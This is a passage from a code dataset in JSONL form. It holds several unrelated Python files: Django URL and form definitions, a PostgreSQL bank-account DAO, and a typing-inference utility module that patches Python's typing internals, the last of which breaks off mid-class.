plt.figure()\r\n","repo_name":"Paraniodparania/img-process","sub_path":"DCT-Arnold.py","file_name":"DCT-Arnold.py","file_ext":"py","file_size_in_byte":9742,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"11178834689","text":"from django.contrib import admin\nfrom django.urls import path, include, re_path\n\nfrom . import views\n\napp_name = \"cursos\"\n\nurlpatterns = [\n path('', views.cursos, name=\"list\"),\n path('nuevo/', views.curso_nuevo, name=\"nuevo\"),\n path('/', views.curso_detail, name=\"detail\"),\n path('/editar/', views.curso_editar, name=\"editar\"),\n path('/borrar/', views.curso_borrar, name=\"borrar\"),\n path('/alumnos/nuevo/', views.curso_nuevo_alumno, name=\"nuevo_alumno\"),\n path('/alumnos//editar/', views.curso_editar_alumno, name=\"editar_alumno\"),\n path('/alumnos//borrar/', views.curso_borrar_alumno, name=\"borrar_alumno\"),\n]\n","repo_name":"javinievas/minervademo","sub_path":"minerva/cursos/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":713,"program_lang":"python","lang":"ar","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"36303692996","text":"from typing import List\n\nfrom daos.account_dao import AccountDAO\nfrom entities.account import Account\nfrom utils.connection_util import connection\n\n\nclass AccountDAOPostgres(AccountDAO):\n def create_account(self, client_id: int) -> Account:\n sql = \"\"\"insert into account values (default, %s, '', 0) returning account_id\"\"\"\n cursor = connection.cursor()\n cursor.execute(sql, (str(client_id)))\n connection.commit()\n account_id = cursor.fetchone()[0]\n account = Account(account_id, client_id, \"\", 0)\n return account\n\n def get_accounts_by_client_id(self, client_id: int) -> List[Account]:\n sql = \"\"\"select * from account where client_id = %s order by account_id\"\"\"\n cursor = connection.cursor()\n cursor.execute(sql, (str(client_id)))\n records = cursor.fetchall()\n account_list = []\n for account_parts in records:\n account = Account(account_parts[0], account_parts[1], account_parts[2], account_parts[3])\n account_list.append(account)\n return account_list\n\n def get_accounts_between(self, client_id: int, lower_bound: int, upper_bound: int) -> List[Account]:\n sql = \"\"\"select * from account where client_id = %s and balance > %s and balance < %s order by account_id\"\"\"\n cursor = connection.cursor()\n cursor.execute(sql, (str(client_id), str(lower_bound), str(upper_bound)))\n records = cursor.fetchall()\n account_list = []\n for account_parts in records:\n account = Account(account_parts[0], account_parts[1], account_parts[2], account_parts[3])\n account_list.append(account)\n return account_list\n\n def get_account_by_account_number(self, client_id: int, account_number: int) -> Account:\n sql = \"\"\"select * from account where client_id = %s and account_id = %s\"\"\"\n cursor = connection.cursor()\n cursor.execute(sql, (str(client_id), str(account_number)))\n records = cursor.fetchall()\n for account_parts in records:\n account = Account(account_parts[0], account_parts[1], account_parts[2], account_parts[3])\n return account\n raise KeyError\n\n def update_account(self, client_id: int, account_number: int, account: Account) -> Account:\n sql = \"\"\"update account set account_name = %s, balance = %s where client_id = %s and account_id = %s \n returning account\"\"\"\n cursor = connection.cursor()\n cursor.execute(sql, (str(account.name), str(account.balance), str(client_id), str(account_number)))\n connection.commit()\n return self.get_account_by_account_number(client_id, account_number)\n\n def deposit(self, client_id: int, account_number: int, amount: float) -> Account:\n sql = \"\"\"update account set balance = balance + %s where client_id = %s and account_id = %s\"\"\"\n cursor = connection.cursor()\n cursor.execute(sql, (str(amount), str(client_id), str(account_number)))\n connection.commit()\n return self.get_account_by_account_number(client_id, account_number)\n\n def withdraw(self, client_id: int, account_number: int, amount: float) -> Account:\n sql = \"\"\"update account set balance = balance - %s where client_id = %s and account_id = %s\"\"\"\n cursor = connection.cursor()\n cursor.execute(sql, (str(amount), str(client_id), str(account_number)))\n connection.commit()\n return self.get_account_by_account_number(client_id, account_number)\n\n def transfer(self, client_id: int, transfer_from: int, transfer_to: int, amount: float) -> List[Account]:\n account1 = self.withdraw(client_id, transfer_from, amount)\n account2 = self.deposit(client_id, transfer_to, amount)\n account_list = [account1, account2]\n return account_list\n\n def delete_account(self, client_id: int, account_number: int):\n sql = \"\"\"delete from account where client_id = %s and account_id = %s\"\"\"\n cursor = connection.cursor()\n cursor.execute(sql, (client_id, account_number))\n connection.commit()\n return True\n","repo_name":"bostonbragg/Project0","sub_path":"daos/account_dao_postgres.py","file_name":"account_dao_postgres.py","file_ext":"py","file_size_in_byte":4113,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"9944264503","text":"from django import forms\nfrom .models import Todo, Contact\n\n\nclass TodoForm(forms.ModelForm):\n title = forms.CharField(\n label=\"Title\",\n help_text=\"Enter the title of your todo item.\",\n widget=forms.TextInput(attrs={'class': 'form-control'})\n )\n content = forms.CharField(\n label=\"Content\",\n help_text=\"Enter the content of your todo item.\",\n widget=forms.Textarea(attrs={'class': 'form-control'})\n )\n is_completed = forms.BooleanField(\n label=\"Is completed\",\n help_text=\"Check this box if the item is completed.\",\n required=False,\n widget=forms.CheckboxInput(attrs={'class': 'form-check-input'})\n )\n\n class Meta:\n model = Todo\n fields = ['title', 'content', 'is_completed']\n\nclass ContactForm(forms.ModelForm):\n name = forms.CharField(\n label=\"Name\",\n help_text=\"Enter your name.\",\n widget=forms.TextInput(attrs={'class': 'form-control'})\n )\n email = forms.EmailField(\n label=\"Email\",\n help_text=\"Enter your email address.\",\n widget=forms.EmailInput(attrs={'class': 'form-control'})\n )\n message = forms.CharField(\n label=\"Message\",\n help_text=\"Enter your message.\",\n widget=forms.Textarea(attrs={'class': 'form-control'})\n )\n\n class Meta:\n model = Contact\n fields = ['name', 'email', 'message']\n","repo_name":"sinansarikaya/django-todo-app","sub_path":"todos/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":1399,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"19518889173","text":"from __future__ import annotations\n\nimport collections.abc\nimport copy\nimport dataclasses\nimport functools\nimport inspect\nimport logging\nimport sys\nimport types\nimport typing\n\nimport typing_inspect\n\nfrom .dict_tools import *\n\n__all__ = [\n \"get_type\",\n \"get_arg_hints\",\n \"GenericCheck\",\n \"infer\",\n \"TypeVarMapping\",\n \"OfType\",\n \"replace_typevars\",\n \"match_functions\",\n \"match_values\",\n \"BoundInfer\",\n \"TypeVarScope\",\n \"infer_return_type\",\n \"ExpandedType\",\n \"replace_fn_typevars\",\n \"merge_typevars\",\n \"match_types\",\n \"get_origin_type\",\n \"get_fn_typevars\",\n \"ToCallable\",\n]\n\nT = typing.TypeVar(\"T\")\nU = typing.TypeVar(\"U\")\n\nlogger = logging.getLogger(__name__)\nlogger.addFilter(lambda record: False)\n# logger.addFilter(lambda record: record.msg.startswith(\"infer_return_type\"))\n\n\nclass GenericCheckType(type):\n @functools.lru_cache()\n def __subclasscheck__(cls, sub):\n \"\"\"\n Modified from https://github.com/python/cpython/blob/aa73841a8fdded4a462d045d1eb03899cbeecd65/Lib/typing.py#L707-L717\n \"\"\"\n sub = getattr(sub, \"__origin__\", sub)\n if hasattr(cls, \"__origin__\"):\n return issubclass(sub, cls)\n if sub == typing.Any:\n return False\n\n # Needed when checking if T or Union is instance of Expression\n if isinstance(sub, typing.TypeVar) or sub == typing.Union: # type: ignore\n return False\n return super().__subclasscheck__(sub)\n\n\nclass GenericCheck(metaclass=GenericCheckType):\n \"\"\"\n Subclass this to support isinstance and issubclass checks with generic classes.\n \"\"\"\n\n pass\n\n\nclass OfType(GenericCheck, typing.Generic[T]):\n \"\"\"\n OfType[T] should be considered a subclass of T even though it is not.\n \"\"\"\n\n pass\n\n\nclass ExpandedType(GenericCheck, typing.Generic[T]):\n \"\"\"\n ExpandedType should be thought of as being expanded when passed into a function,\n so that `fn(ExpandedType[int]())` will be thought of as `fn(*xs)` where xs is an iterable of `int`.\n \"\"\"\n\n pass\n\n\noriginal_generic_getattr = typing._GenericAlias.__getattr__ # type: ignore\n\n\ndef generic_getattr(self, attr):\n \"\"\"\n Allows classmethods to get generic types\n by checking if we are getting a descriptor type\n and if we are, we pass in the generic type as the class\n instead of the origin type.\n\n Modified from\n https://github.com/python/cpython/blob/aa73841a8fdded4a462d045d1eb03899cbeecd65/Lib/typing.py#L694-L699\n \"\"\"\n if \"__origin__\" in self.__dict__ and attr not in (\n \"__wrapped__\",\n \"__union_params__\",\n ):\n # If the attribute is a descriptor, pass in the generic class\n try:\n property = self.__origin__.__getattribute__(self.__origin__, attr)\n except Exception:\n return\n\n if hasattr(property, \"__get__\"):\n return property.__get__(None, self)\n # Otherwise, just resolve it normally\n return getattr(self.__origin__, attr)\n raise AttributeError(attr)\n\n\ntyping._GenericAlias.__getattr__ = generic_getattr # type: ignore\n\n\n# Allow isinstance and issubclass calls on generic types\ndef generic_subclasscheck(self, cls):\n \"\"\"\n Modified from https://github.com/python/cpython/blob/aa73841a8fdded4a462d045d1eb03899cbeecd65/Lib/typing.py#L707-L717\n \"\"\"\n self_origin = self.__origin__\n cls_origin = getattr(cls, \"__origin__\", cls)\n\n # If we are a callable type and other cls is is not an actualy callable\n # type, match against the ToCallable type instead\n if (\n self_origin == collections.abc.Callable\n and cls_origin != collections.abc.Callable\n ):\n self_origin = ToCallable\n return issubclass(cls_origin, self_origin)\n\n\n# Allow isinstance and issubclass calls on special forms like union\ndef special_form_subclasscheck(self, cls):\n if self == typing.Any:\n return True\n if self == cls:\n return True\n raise TypeError\n\n\ntyping._GenericAlias.__subclasscheck__ = generic_subclasscheck # type: ignore\ntyping._SpecialForm.__subclasscheck__ = special_form_subclasscheck # type: ignore\n\n\nclass ToCallableMeta(type):\n \"\"\"\n Type of type that can be used in isubclass to determine whether\n it wil be understood as a callable from the typing_tools perspective.\n\n Basically whatever is coerced in `get_type` to a callable.\n\n Need to switch typing.Callable for this, because that uses anything that works\n like a callable, which is not waht we want\n \"\"\"\n\n def __instancecheck__(cls, inst):\n return isinstance(\n inst,\n (\n functools.partial,\n Infer,\n BoundInfer,\n FunctionReplaceTyping,\n types.FunctionType,\n ),\n )\n\n def __subclasscheck__(cls, sub):\n \"\"\"Implement issubclass(sub, cls).\"\"\"\n return (\n issubclass(\n sub,\n (\n functools.partial,\n Infer,\n BoundInfer,\n FunctionReplaceTyping,\n types.FunctionType,\n ),\n )\n or typing_inspect.get_origin(sub) == collections.abc.Callable\n )\n\n\nclass ToCallable(metaclass=ToCallableMeta):\n def __call__(*__args, **__kwargs):\n ...\n\n\ndef get_origin(t: typing.Type) -> typing.Type:\n origin = typing_inspect.get_origin(t)\n # Need workaround for sequences\n # https://github.com/ilevkivskyi/typing_inspect/issues/36\n if origin == collections.abc.Sequence:\n return typing.Sequence\n\n if origin == tuple:\n return typing.Tuple # type: ignore\n\n return origin\n\n\ndef get_function_type(fn: typing.Callable) -> typing.Type[typing.Callable]:\n \"\"\"\n Gets the type of a function:\n\n Only supports positional args currently\n\n >>> get_function_type(lambda i: i)\n typing.Callable[[typing.Any], typing.Any]\n\n >>> def fn(a: int, b: str) -> float: ...\n >>> get_function_type(fn)\n typing.Callable[[int, str], float]\n\n >>> def no_return_type(a: int, b: str): ...\n >>> get_function_type(no_return_type)\n typing.Callable[[int, str], typing.Any]\n\n >>> def no_arg_type(a, b: str): ...\n >>> get_function_type(no_arg_type)\n typing.Callable[[typing.Any, str], typing.Any]\n \"\"\"\n signature = inspect_signature(fn)\n type_hints = typing_get_type_hints(fn)\n arg_hints: typing.List[typing.Type] = []\n\n for arg_name, p in signature.parameters.items():\n if p.kind == inspect.Parameter.POSITIONAL_OR_KEYWORD:\n arg_hints.append(\n type_hints.get(arg_name, typing.cast(typing.Type, typing.Any))\n )\n else:\n raise NotImplementedError(f\"Does not support getting type of {signature}\")\n return typing.Callable[arg_hints, type_hints.get(\"return\", typing.Any)] # type: ignore\n\n\ndef get_function_replace_type(f: FunctionReplaceTyping) -> typing.Type[typing.Callable]:\n return replace_typevars(f.typevars, get_function_type(f.fn))\n\n\ndef get_bound_infer_type(b: BoundInfer) -> typing.Type[typing.Callable]:\n \"\"\"\n Returns a typing.Callable type that corresponds to the type of the bound infer.\n\n TODO: This logic is a combination of `get_function_type` and `infer_return_type`.\n We should eventually merge all of this into a consistant API so we don't have to duplicate this code.\n \"\"\"\n hints = copy.copy(typing_get_type_hints(b.fn))\n signature = inspect_signature(b.fn)\n\n # We want to get the original type hints for the first arg,\n # and match those against the first arg in the bound, so we get a typevar mapping\n first_arg_name = next(iter(signature.parameters.keys()))\n typevars: TypeVarMapping\n # Whether to skip the first arg of the param of the signature when computing the signature\n skip_first_param: bool\n owner_origin = get_origin_type(b.owner)\n if b.is_classmethod:\n # If we called this as a class method\n typevars = match_type(typing.cast(type, typing.Type[owner_origin]), b.owner)\n skip_first_param = True\n else:\n # we are calling an instance method on the class and passing the instance as the first arg\n typevars = match_type(typing.cast(type, typing.Type[owner_origin]), b.owner)\n skip_first_param = False\n hints[first_arg_name] = owner_origin\n\n # Then we want to replace all the typevar hints, with what we now know from the first arg\n arg_hints: typing.List[typing.Type] = []\n\n for arg_name, p in signature.parameters.items():\n if skip_first_param:\n skip_first_param = False\n continue\n if p.kind == inspect.Parameter.POSITIONAL_OR_KEYWORD:\n arg_hints.append(\n replace_typevars(\n typevars, hints.get(arg_name, typing.cast(typing.Type, typing.Any))\n )\n )\n else:\n raise NotImplementedError(f\"Does not support getting type of {signature}\")\n return typing.cast(\n type,\n typing.Callable[\n arg_hints, # type: ignore\n replace_typevars(\n typevars, hints.get(\"return\", typing.cast(typing.Type, typing.Any))\n ),\n ],\n )\n\n\ndef get_type(v: T) -> typing.Type[T]:\n \"\"\"\n Returns the type of the value with generic arguments preserved.\n \"\"\"\n if isinstance(v, functools.partial): # type: ignore\n inner_type = get_type(v.func) # type: ignore\n if v.keywords: # type: ignore\n raise TypeError\n inner_args, inner_return = typing_inspect.get_args(inner_type)\n mapping: TypeVarMapping = merge_typevars(\n *(\n match_type(arg_type, arg)\n for (arg_type, arg) in zip(inner_args, v.args) # type: ignore\n )\n )\n rest_arg_types = inner_args[len(v.args) :] # type: ignore\n return typing.cast(\n type,\n typing.Callable[\n [replace_typevars(mapping, arg) for arg in rest_arg_types],\n replace_typevars(mapping, inner_return),\n ],\n )\n\n if isinstance(v, Infer):\n return get_function_type(v.fn) # type: ignore\n if isinstance(v, BoundInfer):\n return get_bound_infer_type(v) # type: ignore\n if isinstance(v, FunctionReplaceTyping):\n return get_function_replace_type(v) # type: ignore\n\n tp = typing_inspect.get_generic_type(v)\n # Special case, only support homogoneous tuple that are inferred to iterables\n if tp == tuple:\n if v:\n return typing.Sequence[get_type(v[0])] # type: ignore\n return typing.Sequence # type: ignore\n # Special case, also support function types.\n if tp == types.FunctionType: # noqa: E721\n return get_function_type(v) # type: ignore\n\n return tp\n\n\nTypeVarMapping = typing.Mapping[typing.TypeVar, typing.Type] # type: ignore\n\n\ndef match_values(hint_value: T, value: T) -> TypeVarMapping:\n logger.debug(\"match_values hint_value=%s value=%s\", hint_value, value)\n hint_type = get_type(hint_value)\n logger.debug(\"hint_type=%s\", hint_type)\n return match_type(hint_type, value)\n\n\ndef match_type(hint: typing.Type[T], value: T) -> TypeVarMapping:\n logger.debug(\"match_type hint=%s value=%s\", hint, value)\n\n if typing_inspect.get_origin(hint) == type:\n (inner_hint,) = typing_inspect.get_args(hint)\n return match_types(inner_hint, typing.cast(typing.Type, value))\n return match_types(hint, get_type(value))\n\n\ndef merge_typevars(*typevars: TypeVarMapping) -> TypeVarMapping:\n \"\"\"\n Merges typevar mappings. If there is a duplicate key, either the values should be the\n same or one should have `typing.Any` type, or one should be a typevar itself. If it is a typevar,\n that typevar is also set to the other's value\n \"\"\"\n merged: TypeVarMapping = {}\n typevars_: typing.List[TypeVarMapping] = list(typevars)\n while typevars_:\n tvs: TypeVarMapping = typevars_.pop()\n for tv, tp in tvs.items(): # type: ignore\n if tv not in merged:\n merged[tv] = tp # type: ignore\n continue\n prev_tp = merged[tv]\n if prev_tp == typing.Any:\n merged[tv] = tp # type: ignore\n elif prev_tp == tp or tp == typing.Any:\n pass\n elif typing_inspect.is_typevar(prev_tp):\n merged[prev_tp] = merged[tv] = tp # type: ignore\n elif typing_inspect.is_typevar(tp):\n merged[tp] = prev_tp # type: ignore\n else:\n # Try merging them and choosing replacing the hint with the\n # merged values\n try:\n merged[tv] = replace_typevars( # type: ignore\n match_types(prev_tp, tp), prev_tp\n )\n continue\n except TypeError:\n pass\n try:\n merged[tv] = replace_typevars( # type: ignore\n match_types(tp, prev_tp), tp\n )\n continue\n except TypeError:\n pass\n raise TypeError(f\"Cannot merge {prev_tp} and {tp} for type var {tv}\")\n return merged\n\n\ndef get_inner_types(t: typing.Type) -> typing.Iterable[typing.Type]:\n \"\"\"\n Returns the inner types for a type.\n\n Like `typing_inspect.get_args` but special cases callable, so it returns\n the return type, then all the arg types.\n \"\"\"\n if t == typing.Callable: # type: ignore\n return []\n if typing_inspect.get_origin(t) == collections.abc.Callable:\n arg_types, return_type = typing_inspect.get_args(t)\n return [return_type] + arg_types\n return typing_inspect.get_args(t)\n\n\ndef get_all_typevars(t: typing.Type) -> typing.Iterable[typing.TypeVar]: # type: ignore\n for t in get_inner_types(t):\n if isinstance(t, typing.TypeVar): # type: ignore\n yield t\n else:\n yield from get_all_typevars(t)\n\n\ndef match_types(hint: typing.Type, t: typing.Type) -> TypeVarMapping:\n \"\"\"\n Matches a type hint with a type, return a mapping of any type vars to their values.\n \"\"\"\n logger.debug(\"match_types hint=%s type=%s\", hint, t)\n if hint == object:\n hint = typing.Any # type: ignore\n if t == object:\n t = typing.Any # type: ignore\n if hint == t:\n return {}\n\n # If it is an instance of OfType[Type[T]], then we should consider it as T\n if isinstance(t, OfType):\n (of_type,) = typing_inspect.get_args(get_type(t))\n assert issubclass(of_type, typing.Type)\n (t,) = typing_inspect.get_args(of_type)\n return match_types(hint, t)\n\n # If the type is an OfType[T] then we should really just consider it as T\n if issubclass(t, OfType) and not issubclass(hint, OfType):\n (t,) = typing_inspect.get_args(t)\n return match_types(hint, t)\n if issubclass(hint, OfType) and not issubclass(t, OfType):\n (hint,) = typing_inspect.get_args(hint)\n return match_types(hint, t)\n\n # Matching an expanded type is like matching just whatever it represents\n if issubclass(t, ExpandedType):\n (t,) = typing_inspect.get_args(t)\n\n if typing_inspect.is_typevar(hint):\n return {typing.cast(typing.TypeVar, hint): t}\n\n # This happens with match rule on conversion, like when the value is TypeVar\n if typing_inspect.is_typevar(t):\n return {}\n\n # if both are generic sequences, verify they are the same and have the same contents\n if (\n typing_inspect.is_generic_type(hint)\n and typing_inspect.is_generic_type(t)\n and typing_inspect.get_origin(hint) == collections.abc.Sequence\n and typing_inspect.get_origin(t) == collections.abc.Sequence\n ):\n try:\n t_inner = typing_inspect.get_args(t)[0]\n except IndexError:\n # Same as below, checking for default one, but in Python 3.9+\n # where the default sequence has no arg\n return {}\n if sys.version_info < (3, 9):\n # If t's inner arg is just the default one for sequence, it hasn't be initialized so assume\n # it was an empty tuple that created it and just return a match\n if t_inner == typing_inspect.get_args(typing.Sequence)[0]:\n return {}\n return match_types(typing_inspect.get_args(hint)[0], t_inner)\n\n if typing_inspect.is_union_type(hint):\n possible_types = typing_inspect.get_args(hint)\n # If union has a None type in it, and this value is None, there is a match\n if typing_inspect.is_optional_type(t) and isinstance(None, t):\n return {}\n # If this is a union, iterate through and try each\n for inner_type in possible_types:\n try:\n return match_types(inner_type, t)\n except TypeError:\n pass\n raise TypeError(\n f\"Cannot match concrete type {t} with any of the union types {possible_types}\"\n )\n\n logger.debug(\"checking if type subclass hint hint=%s type=%s\", hint, t)\n # Special case ellipsis to allow it to be used as a wildcard\n # to support using ... as default argument\n if not issubclass(t, hint) and not isinstance(..., t):\n logger.debug(\"not subclass\")\n raise TypeError(f\"Cannot match concrete type {t} with hint {hint}\")\n return merge_typevars(\n *(\n match_types(inner_hint, inner_t)\n for inner_hint, inner_t in zip(get_inner_types(hint), get_inner_types(t))\n )\n )\n\n\ndef get_origin_type(t: typing.Type) -> typing.Type:\n \"\"\"\n Takes in a type, and if it is a generic type, returns the original type hint.\n\n typing.List[int] -> typing.List[T]\n \"\"\"\n t = get_origin(t) or t\n\n params = typing_inspect.get_parameters(t)\n if params:\n return t[params]\n return t\n\n\nT_type = typing.TypeVar(\"T_type\", bound=typing.Type)\n\n\ndef replace_typevars(typevars: TypeVarMapping, hint: T_type) -> T_type:\n \"\"\"\n Replaces type vars in a type hint with other types.\n \"\"\"\n if typing_inspect.is_typevar(hint):\n return typing.cast(\n T_type, typevars.get(typing.cast(typing.TypeVar, hint), hint)\n )\n\n # Special case empty callable, which raisees error on getting args\n if hint == typing.Callable: # type: ignore\n return hint\n if typing_inspect.get_origin(hint) == collections.abc.Callable:\n arg_types, return_type = typing_inspect.get_args(hint)\n return typing.cast(\n T_type,\n typing.Callable[\n [replace_typevars(typevars, a) for a in arg_types],\n replace_typevars(typevars, return_type),\n ],\n )\n\n args = typing_inspect.get_args(hint)\n if not args:\n return hint\n replaced_args = tuple(replace_typevars(typevars, arg) for arg in args)\n return get_origin(hint)[replaced_args]\n\n\n@functools.lru_cache()\ndef inspect_signature(fn: typing.Callable) -> inspect.Signature:\n return inspect.signature(fn)\n\n\n@functools.lru_cache()\ndef typing_get_type_hints(fn: typing.Callable) -> typing.Dict[str, typing.Type]:\n return typing.get_type_hints(fn)\n\n\ndef get_arg_hints(fn: typing.Callable) -> typing.List[typing.Type]:\n signature = inspect_signature(fn)\n hints = typing_get_type_hints(fn)\n return [hints[param] for param in signature.parameters.keys()]\n\n\ndef infer_return_type(\n fn: typing.Callable[..., T],\n owner: typing.Optional[typing.Type],\n is_classmethod: bool,\n args: typing.Tuple[object, ...],\n kwargs: typing.Mapping[str, object],\n) -> typing.Tuple[\n typing.Tuple[object, ...],\n typing.Mapping[str, object],\n typing.Type[T],\n TypeVarMapping,\n]:\n logger.debug(\n \"infer_return_type fn=%s owner=%s args=%s kwargs=%s\", fn, owner, args, kwargs\n )\n hints = copy.copy(typing_get_type_hints(fn))\n signature = inspect_signature(fn)\n\n mappings: typing.List[TypeVarMapping] = []\n # This case is triggered if we got here from a __get__ call\n # in a descriptor\n if owner:\n first_arg_name = next(iter(signature.parameters.keys()))\n first_arg_type: typing.Type\n owner_origin = get_origin_type(owner)\n if is_classmethod:\n # If we called this as a class method, add the owner to\n # the args add the inferred type to the hints.\n args = (owner,) + args # type: ignore\n first_arg_type = typing.Type[owner_origin] # type: ignore\n else:\n # If the owner had type parameters set, we should use those to start computing variables\n # i.e. Class[int].__add__\n mappings.append(match_types(owner_origin, owner))\n first_arg_type = owner_origin # type: ignore\n\n if first_arg_name not in hints:\n hints[first_arg_name] = first_arg_type # type: ignore\n\n bound = signature.bind(*args, **kwargs)\n bound.apply_defaults()\n\n # We need to edit the arguments to pop off the variable one\n arguments = copy.copy(bound.arguments)\n\n for arg_name, p in signature.parameters.items():\n if p.kind == inspect.Parameter.VAR_POSITIONAL:\n variable_args = arguments.pop(arg_name)\n argument_items = list(arguments.items())\n argument_items += [(arg_name, a) for a in variable_args]\n break\n else:\n argument_items = list(arguments.items())\n\n return_hint: typing.Type[T] = hints.pop(\"return\", typing.Any) # type: ignore\n\n mappings += [\n match_type(hints.get(name, typing.Any), arg) # type: ignore\n for name, arg in argument_items\n ]\n try:\n matches: TypeVarMapping = merge_typevars(*mappings)\n except ValueError:\n raise TypeError(f\"Couldn't merge mappings {mappings}\")\n final_args = bound.args[1:] if is_classmethod else bound.args\n final_kwargs = bound.kwargs\n logger.debug(\n \"infer_return_type matches=%s args=%s kwargs=%s\", matches, args, kwargs\n )\n for arg in final_args:\n record_scoped_typevars(arg, *matches.keys())\n for kwarg in final_kwargs.values():\n record_scoped_typevars(kwarg, *matches.keys())\n return (final_args, final_kwargs, replace_typevars(matches, return_hint), matches)\n\n\ndef record_scoped_typevars(f: object, *additional_typevars: typing.TypeVar) -> None: # type: ignore\n if not isinstance(f, types.FunctionType):\n return\n f.__scoped_typevars__ = frozenset( # type: ignore\n {\n *get_all_typevars(get_function_type(f)),\n *get_typevars_in_scope(),\n *additional_typevars,\n }\n )\n\n\nWrapperType = typing.Callable[\n [\n typing.Callable[..., T],\n typing.Tuple[object, ...],\n typing.Mapping[str, object],\n typing.Type[T],\n ],\n U,\n]\n\n\n_TYPEVARS_IN_SCOPE: typing.Counter[ # type: ignore\n typing.TypeVar\n] = collections.Counter()\n\n\ndef get_typevars_in_scope() -> typing.Set[typing.TypeVar]: # type: ignore\n return set(k for k, v in _TYPEVARS_IN_SCOPE.items() if v > 0)\n\n\n@dataclasses.dataclass\nclass TypeVarScope:\n typevars_in_scope: typing.Tuple[typing.TypeVar, ...] # type: ignore\n\n def __init__(self, *tvs: typing.TypeVar) -> None: # type: ignore\n self.typevars_in_scope = tvs\n\n def __enter__(self) -> None:\n _TYPEVARS_IN_SCOPE.update(self.typevars_in_scope)\n\n def __exit__(self, *exc_details) -> None:\n _TYPEVARS_IN_SCOPE.subtract(self.typevars_in_scope)\n\n\n@dataclasses.dataclass\nclass NewTypeVarScope:\n previous_typvars_in_scope: typing.Optional[ # type: ignore\n typing.Counter[typing.TypeVar]\n ] = None\n\n def __enter__(self) -> None:\n assert not self.previous_typvars_in_scope\n self.previous_typvars_in_scope = collections.Counter(_TYPEVARS_IN_SCOPE)\n _TYPEVARS_IN_SCOPE.clear()\n\n def __exit__(self, *exc_details) -> None:\n assert self.previous_typvars_in_scope\n _TYPEVARS_IN_SCOPE.update(self.previous_typvars_in_scope)\n\n\n@dataclasses.dataclass(unsafe_hash=True)\nclass Infer(typing.Generic[T, U]):\n fn: typing.Callable[..., T]\n wrapper: WrapperType[T, U] = dataclasses.field(repr=False)\n\n def __post_init__(self):\n functools.update_wrapper(self, self.fn)\n\n def __call__(self, *args, **kwargs) -> U:\n *wrapper_args, typevars = infer_return_type(self.fn, None, False, args, kwargs)\n with TypeVarScope(*typevars.keys()):\n res = self.wrapper(self, *wrapper_args) # type: ignore\n return res\n\n def __get__(self, instance, owner) -> BoundInfer[T, U]:\n is_classmethod = isinstance(self.fn, classmethod)\n is_property = isinstance(self.fn, property)\n if is_classmethod and is_property:\n raise NotImplementedError(\"classmethod properties are not supported\")\n fn = self.fn\n if is_classmethod:\n fn = fn.__func__ # type: ignore\n if is_property:\n fn = fn.fget # type: ignore\n if instance:\n method = BoundInfer( # type: ignore\n fn, self.wrapper, get_type(instance), is_classmethod # type: ignore\n )\n # if this is not a classmethod we are calling on an instance, bind the first value to self\n if not is_classmethod:\n method = functools.partial(method, instance) # type: ignore\n if is_property:\n return method() # type: ignore\n return method # type: ignore\n return BoundInfer( # type: ignore\n fn, self.wrapper, owner, is_classmethod # type: ignore\n )\n\n def __repr__(self):\n return getattr(self.fn, \"__name__\", str(self.fn))\n\n\nSPECIAL_BINARY_METHODS = {\n f\"__{n}__\"\n for n in [\n # comparison\n \"lt\",\n \"le\",\n \"eq\",\n \"ne\",\n \"gt\",\n \"ge\",\n # numeric\n \"add\",\n \"sub\",\n \"mul\",\n \"matmul\",\n \"truediv\",\n \"mod\",\n \"divmod\",\n \"pow\",\n \"lshift\",\n \"rshift\",\n \"and\",\n \"xor\",\n \"or\",\n ]\n}\n\n\n@dataclasses.dataclass(unsafe_hash=True)\nclass BoundInfer(typing.Generic[T, U]):\n fn: typing.Callable[..., T]\n wrapper: WrapperType[T, U] = dataclasses.field(repr=False)\n owner: typing.Type\n is_classmethod: bool\n\n def __post_init__(self):\n functools.update_wrapper(self, self.fn)\n\n def __call__(self, *args, **kwargs) -> U:\n try:\n *wrapper_args, typevars = infer_return_type(\n self.fn, self.owner, self.is_classmethod, args, kwargs\n )\n except TypeError:\n # Return NotImplemented from special methods\n # if it cannot handle the types, instead of throwing\n # https://docs.python.org/3/library/constants.html#NotImplemented\n if self.fn.__name__ in SPECIAL_BINARY_METHODS:\n return NotImplemented\n raise\n with TypeVarScope(*typevars.keys()):\n res = self.wrapper(self, *wrapper_args) # type: ignore\n return res\n\n def __repr__(self):\n return f\"{type_repr(self.owner)}.{self.fn.__name__}\"\n\n\ndef type_repr(tp: type) -> str:\n \"\"\"\n Returns the repr for the type, preserving any generic params.\n\n Unlike the builtin generic type repr, it does not include the module.\n \"\"\"\n if isinstance(tp, (typing.TypeVar, typing._SpecialForm)):\n return repr(tp)\n tp_name = tp.__qualname__\n args = getattr(tp, \"__args__\", [])\n if args:\n return f\"{tp_name}[{', '.join(map(type_repr, args))}]\"\n return tp_name\n\n\ndef infer(\n fn: typing.Callable[..., T], wrapper: WrapperType[T, U]\n) -> typing.Callable[..., U]:\n \"\"\"\n Wraps a function to return the args, kwargs, and the inferred return type based\n on the arguments.\n\n This raise a TypeError when called with types that are invalid.\n\n It refers on the explicit generic types of the arguments, it does not traverse\n them to check their types. That means if you pass in `[1, 2, 3]` it won't know\n this is a `typing.List[int]`. Instead it, will only know if you create a generic\n instance manually from a custom generic class like, `MyList[int](1, 2, 3)`.\n \"\"\"\n\n return Infer(fn, wrapper)\n\n\ndef match_functions(\n fn_with_typevars: typing.Callable, fn: typing.Callable\n) -> TypeVarMapping:\n if not isinstance(fn_with_typevars, BoundInfer) or not isinstance(fn, BoundInfer):\n if fn_with_typevars == fn:\n return {}\n raise TypeError(f\"{fn_with_typevars} != {fn}\")\n if fn_with_typevars.fn == fn.fn:\n return match_types(fn_with_typevars.owner, fn.owner)\n raise TypeError(f\"{fn_with_typevars} != {fn}\")\n\n\n@dataclasses.dataclass(unsafe_hash=True)\nclass FunctionReplaceTyping:\n fn: typing.Callable\n typevars: HashableMapping[typing.TypeVar, typing.Type] # type: ignore\n typevars_in_scope: typing.FrozenSet[typing.TypeVar] # type: ignore\n inner_mapping: typing.Callable[[typing.Any], typing.Any] = dataclasses.field(\n repr=False\n )\n\n 